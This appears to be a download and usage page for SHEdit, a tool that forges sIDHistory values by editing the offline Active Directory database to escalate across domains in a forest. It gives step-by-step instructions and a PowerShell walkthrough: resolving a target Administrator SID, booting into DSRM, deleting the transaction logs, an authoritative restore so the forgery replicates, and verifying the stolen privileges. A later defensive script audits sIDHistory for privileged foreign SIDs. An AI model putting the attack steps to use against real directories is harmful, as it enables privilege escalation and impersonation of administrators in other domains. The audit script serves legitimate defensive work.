SHEdit
SHEdit is an offline editor for the sIDHistory (SID History) Active Directory attribute.
The supported way to populate sIDHistory, the DsAddSidHistory API, refuses to copy a SID
from another domain unless the caller supplies credentials that are valid in that domain.
SHEdit bypasses this check by writing the value straight into the offline NTDS.DIT
database file. An administrator of any domain in the forest can therefore give an account
in his own domain the SID of any user in any other domain of the forest, and then access
that domain as that user.
How to use:
- Get the SID of the user in the target domain whose access you want (for example by
reading that user's objectSid attribute).
- Reboot a domain controller of the domain that holds the account you are editing into
Directory Services Restore Mode (DSRM).
- Back up NTDS.DIT (optional but strongly recommended; see the corruption note under
Limitations).
- Run SHEdit.
- Delete all LOG, EDB and CHK files from the %SYSTEMROOT%\NTDS folder. These are the
database engine's transaction log, temporary and checkpoint files, and they must not be
reconciled with the edited database at the next start. If you used %SYSTEMROOT%\NTDS as
SHEdit's temporary folder, the tool has already cleaned these files up for you.
- If the domain has more than one domain controller, perform an authoritative restore of
the AD database (ntdsutil, authoritative restore, restore database) so that the edited
copy replicates to the other controllers instead of being overwritten by their copies.
- Reboot the server normally. The edited account now has the desired access in the target
domain.
- When you are finished, use the ClearSIDHistory.vbs script to delete the sIDHistory
attribute again.
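The steps around the SHEdit run, as commands typed on the domain controller being edited. This is an added example and not part of SHEdit or of its scripts; the names are assumptions: target domain CORP with target user Administrator, the edited account svc-ops in this DC's domain, a backup folder C:\ntds-backup, and boot entry 1 in boot.ini. SHEdit's own command line is not documented on this page and is left as a comment. Run this in a test forest only; it modifies the offline directory database.

```powershell
# Added example (not SHEdit's code). Assumed names: CORP\Administrator as the target user,
# svc-ops as the account whose sIDHistory SHEdit edits, C:\ntds-backup, boot entry 1.

# Step 1 (from any domain-joined machine): resolve the target user's SID.
$acct = New-Object System.Security.Principal.NTAccount('CORP', 'Administrator')
$targetSid = $acct.Translate([System.Security.Principal.SecurityIdentifier]).Value
Write-Host "Target SID: $targetSid"       # S-1-5-21-<CORP domain>-500 for the built-in Administrator

# Step 2: boot this DC into Directory Services Restore Mode.
#   Windows 2003 (boot.ini, bootcfg appends to entry 1):
bootcfg /raw "/safeboot:dsrepair" /a /id 1
#   Windows 2000: add /safeboot:dsrepair to the entry in boot.ini by hand.
#   Windows Server 2008 and later:  bcdedit /set safeboot dsrepair
shutdown /r /t 0

# --- Now logged on in DSRM as the DSRM administrator; the directory service is not running.
# Step 3: back up the database, so the corruption case noted under Limitations is recoverable.
New-Item -ItemType Directory -Path C:\ntds-backup -Force | Out-Null
Copy-Item "$env:SystemRoot\NTDS\ntds.dit" C:\ntds-backup\

# Step 4: run SHEdit against "$env:SystemRoot\NTDS\ntds.dit" (arguments per its own help).

# Step 5: remove the transaction logs, checkpoint and temp database. "*.edb" matches only
# temp.edb here; the database itself is ntds.dit and is kept. Skip this if SHEdit's
# temporary folder was %SystemRoot%\NTDS, since it then removed these files itself.
Remove-Item "$env:SystemRoot\NTDS\*.log", "$env:SystemRoot\NTDS\*.chk", "$env:SystemRoot\NTDS\*.edb" -Force

# Step 6 (only when the domain has several DCs): mark this copy authoritative so the
# edited objects win replication rather than being overwritten by the other DCs.
ntdsutil "authoritative restore" "restore database" quit quit

# Step 7: remove the DSRM switch and reboot normally.
#   2003: reset entry 1's load options (this leaves only /fastdetect); 2000: edit boot.ini;
#   2008 and later: bcdedit /deletevalue safeboot
bootcfg /raw "/fastdetect" /id 1
shutdown /r /t 0

# --- After the normal boot, logged on as svc-ops: the injected SID is part of the
# account's token and is listed with its groups (whoami ships with Windows Server 2003
# and later; on Windows 2000 it comes from the Resource Kit).
whoami /groups                            # look for $targetSid in the SID column

# Step 8: when finished, remove the attribute. This is the same removal the
# ClearSIDHistory.vbs step performs, done here through System.DirectoryServices.
$searcher = New-Object System.DirectoryServices.DirectorySearcher('(sAMAccountName=svc-ops)')
$user = $searcher.FindOne().GetDirectoryEntry()
$user.Properties['sIDHistory'].Clear()    # removing sIDHistory values over LDAP is allowed for admins
$user.CommitChanges()
```

The script is a sequence of console steps separated by two reboots, not one unattended run; each section between the reboot comments is what you type at that stage.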
Limitations:
- Only one sIDHistory value is written. If you run the tool several times, only the latest
value prevails.
- I noticed that in certain rare cases the ntds.dit file gets corrupted and the tool is
unable to open it afterwards. Restore from your backup in that case and try again; it
might work.
A note related to Windows 2000 SP4 and Windows 2003:
- SID history filtering is enabled by default for external trusts.
- SID history filtering is NOT enabled by default for trusts between domains of the same
forest.
This is why the access described above works across the domains of one forest: the
trusting domain honours the injected SID instead of dropping it, as a filtered external
trust would.
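An audit for the other side of this note. It lists every account in the current domain whose sIDHistory holds a SID that SID filtering would drop on a quarantined external trust, that is, any SID whose domain part is not this domain's SID, and flags well-known privileged RIDs among them; inside a forest these entries pass unfiltered. This is an added example, not part of SHEdit or of the linked Microsoft documents; it assumes a domain-joined machine with read access to the directory, and the RID table is the standard set of well-known RIDs.

```powershell
# Added example (not SHEdit's code): audit sIDHistory values in the current domain against
# the SID filtering rule. Well-known RIDs that deserve a look when they show up in sIDHistory.
$privilegedRids = @{ 500 = 'Administrator'; 512 = 'Domain Admins'; 518 = 'Schema Admins'; 519 = 'Enterprise Admins' }

function Get-CurrentDomainSid {
    # objectSid of the domain naming context is the domain SID (S-1-5-21-x-y-z).
    $root   = [ADSI]'LDAP://RootDSE'
    $domain = [ADSI]('LDAP://' + $root.defaultNamingContext)
    New-Object System.Security.Principal.SecurityIdentifier([byte[]]$domain.objectSid.Value, 0)
}

# The rule SID filtering applies on a quarantined trust: a SID survives only when its domain
# part is the SID of the domain the trust points to. Builtin and well-known SIDs have no
# domain part (AccountDomainSid is null) and are dropped as well.
function Test-SidPassesFilter {
    param(
        [System.Security.Principal.SecurityIdentifier]$Sid,
        [System.Security.Principal.SecurityIdentifier]$TrustedDomainSid
    )
    ($Sid.AccountDomainSid -ne $null) -and $Sid.AccountDomainSid.Equals($TrustedDomainSid)
}

function Get-SidHistoryAudit {
    $localDomainSid = Get-CurrentDomainSid
    $searcher = New-Object System.DirectoryServices.DirectorySearcher('(sIDHistory=*)')
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName', 'sIDHistory'))

    foreach ($result in $searcher.FindAll()) {
        $account = [string]$result.Properties['samaccountname'][0]
        # sIDHistory is multi-valued; each value is the binary SID as stored in the directory.
        foreach ($raw in $result.Properties['sidhistory']) {
            $sid = New-Object System.Security.Principal.SecurityIdentifier([byte[]]$raw, 0)
            $rid = [int]$sid.Value.Substring($sid.Value.LastIndexOf('-') + 1)
            $privileged = ''
            if ($privilegedRids.ContainsKey($rid)) { $privileged = $privilegedRids[$rid] }
            New-Object PSObject -Property @{
                Account                 = $account
                HistorySid              = $sid.Value
                # True: another domain (or forest) would drop this SID on a filtered trust,
                # but a trust inside the forest honours it.
                FilteredOnExternalTrust = -not (Test-SidPassesFilter -Sid $sid -TrustedDomainSid $localDomainSid)
                Privileged              = $privileged
            }
        }
    }
}

Get-SidHistoryAudit |
    Sort-Object Privileged, FilteredOnExternalTrust -Descending |
    Select-Object Account, HistorySid, FilteredOnExternalTrust, Privileged |
    Format-Table -AutoSize
```

Legitimate migration leftovers also show FilteredOnExternalTrust as True, since the SIDs they carry come from the old source domain; the Privileged column is what separates an injected Enterprise Admins or Administrator SID from those. Running the audit in each domain of the forest, rather than once, is needed because sIDHistory lives on the account in the domain where it was edited.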
Related links:
Microsoft Security Bulletin MS02-001
Protecting Active Directory from Domain Trust Vulnerability
Using Security Identifier (SID) Filtering to Prevent Elevation of Privilege
Attacks
Design Considerations for Delegation of Administration in Active Directory
Download SHEdit for Windows 2000.
Download SHEdit for Windows 2003.
Support forum here.